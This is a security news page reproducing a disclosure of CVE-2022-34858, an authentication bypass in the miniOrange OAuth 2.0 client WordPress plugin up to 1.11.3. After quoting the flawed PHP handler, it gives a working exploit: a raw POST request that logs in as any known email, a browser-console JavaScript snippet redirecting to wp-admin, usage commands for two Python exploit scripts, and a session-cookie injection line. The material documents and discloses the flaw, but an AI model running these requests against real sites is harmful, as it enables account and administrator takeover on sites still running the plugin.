Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-34858: OAuth 2.0 client for SSO by miniOrange WordPress plugin Authentication Bypass

Authentication Bypass vulnerability in miniOrange OAuth 2.0 client for SSO plugin <= 1.11.3 at WordPress.

CVE
#vulnerability#web#google#linux#java#wordpress#oauth#auth#chrome

The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the client’s website.

Let’s check the plugin

The mo_oauth_login_validate() function includes the following request handling:

if ( isset( $_REQUEST['option'] ) and strpos( $_REQUEST['option'], 'mooauth' ) !== false ) {

    $user_email = '';
    if ( array_key_exists( 'email', $_POST ) ) {
        $user_email = sanitize_email( $_POST['email'] );
    }
    
    if ( $user_email ) {
        if ( email_exists( $user_email ) ) { // user is a member
            $user    = get_user_by( 'email', $user_email );
            $user_id = $user->ID;
            wp_set_auth_cookie( $user_id, true );
        } else { // this user is a guest
            $random_password = wp_generate_password( 10, false );
            $user_id         = wp_create_user( $user_email, $random_password, $user_email );
            wp_set_auth_cookie( $user_id, true );
        }
    }
    wp_redirect( home_url() );
    exit;
}

We can see from the code that if we specify $_POST[‘email’], the plugin will log the user in using the wp_set_auth_cookie() function. No verification or authentication. Nothing.

The other problem with the plugin is that if we give an email address in the request that does not exist in the database, it will create a new user, even if registration on the WordPress website is not enabled.

Let’s see how we can exploit this vulnerability

We only need to send a POST request to exploit this vulnerability.

The HTTP request to the https://lana.solutions/vdb/miniorange-oauth-client/ which is a test WordPress website:

POST /vdb/miniorange-oauth-client/ HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

option=mooauth&[email protected]

Let’s try it in the easiest way. I created a JavaScript code for the exploit that sends a POST request:

So we can even do this through a browser by opening the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/, then going to the console and entering the following code:

var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://lana.solutions/vdb/miniorange-oauth-client/', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.onload = function() {
    window.location.href = 'https://lana.solutions/vdb/miniorange-oauth-client/wp-admin/';
}
xhr.send('option=mooauth&[email protected]');

After successful login, the script will redirect us to the WordPress admin.

The exploit script

I created a Python script that returns the WordPress logged_in cookie:

Source: miniorange_oauth_client_plugin_vdb_get_exploit_cookie.py

How to use:

python3 miniorange_oauth_client_plugin_vdb_get_exploit_cookie.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --email="[email protected]"

Run the above command in the Linux terminal.

We get something like this:

wordpress_logged_in_7c51fdb9c753be4972c4c2d647b5ded1=test%7C1656911674%7C2PsqjZ8FHWAqXOhJFcIU7yQPaQFOwVIpOfdZmQEyavx%7C940bbe2d2e3736724984b401f8f829811e541ffe3eb948f407aeeaae11f423f6

Then all we have to do is use a cookie, such as JavaScript, in the browser console in the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/

document.cookie="wordpress_logged_in_7c51fdb9c753be4972c4c2d647b5ded1=test%7C1656911674%7C2PsqjZ8FHWAqXOhJFcIU7yQPaQFOwVIpOfdZmQEyavx%7C940bbe2d2e3736724984b401f8f829811e541ffe3eb948f407aeeaae11f423f6"; location.reload();

The professional exploit script

I also created a Python script with Selenium that exploits the vulnerability and automatically opens the webpage in Google Chrome:

Source: miniorange_oauth_client_plugin_vdb_exploit_with_selenium.py

How to use:

python3 miniorange_oauth_client_plugin_vdb_exploit_with_selenium.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --email="[email protected]"

Run the above command in the Linux (desktop version) terminal.

Try it

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.

Client: https://lana.solutions/vdb/miniorange-oauth-client/

Server: https://lana.solutions/vdb/miniorange-oauth-server/

Additional tests

I created a Postman request for exploit: Postman Web – MiniOrange Auth Request

Can be used by anyone after fork. The required variables are stored in the collection.

Related news

CVE-2022-34858: WordPress OAuth 2.0 client for SSO plugin <= 1.11.3 - Authentication Bypass vulnerability - Patchstack

Authentication Bypass vulnerability in miniOrange OAuth 2.0 client for SSO plugin <= 1.11.3 at WordPress.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907